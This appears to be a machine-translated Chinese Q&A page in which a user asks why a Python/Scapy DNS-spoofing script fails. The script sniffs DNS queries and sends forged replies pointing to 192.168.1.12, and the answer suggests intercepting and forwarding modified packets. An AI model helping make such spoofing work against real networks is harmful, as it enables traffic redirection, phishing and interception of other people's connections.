假DNS回应

时间:2018-11-12 18:12:11

标签: python sockets dns response scapy

我想用假名创建一个虚假的dns响应,但这是行不通的...当我在Wireshark中嗅探数据包时,它向我表明这些数据包是正确的,但是Windows却会采用真正的响应数据包,尽管... 有人可以告诉我如何解决吗? 谢谢

import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
    if DNS in packet and DNSQR in packet :
        return True
    return False
while True:
    a=sniff(lfilter=f,count=1)
    ip = a[0].getlayer(IP)
    dns = a[0].getlayer(DNS)
    pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
    pkt.show()
    for i in range(10):
        sendp(pkt)

1 个答案:

答案 0 :(得分:1)

您只是在嗅探数据包,如果您想操作数据包,则应将其发送给某个函数,然后将其转发到目标位置。在Sniff中使用prn属性:

packets = sniff(filter="port 53" , prn=func , count=1) 
def func(packet):
    if packet.haslayer(UDP) and packet.haslayer(DNS):
         manipulate your DNS packet here then forward it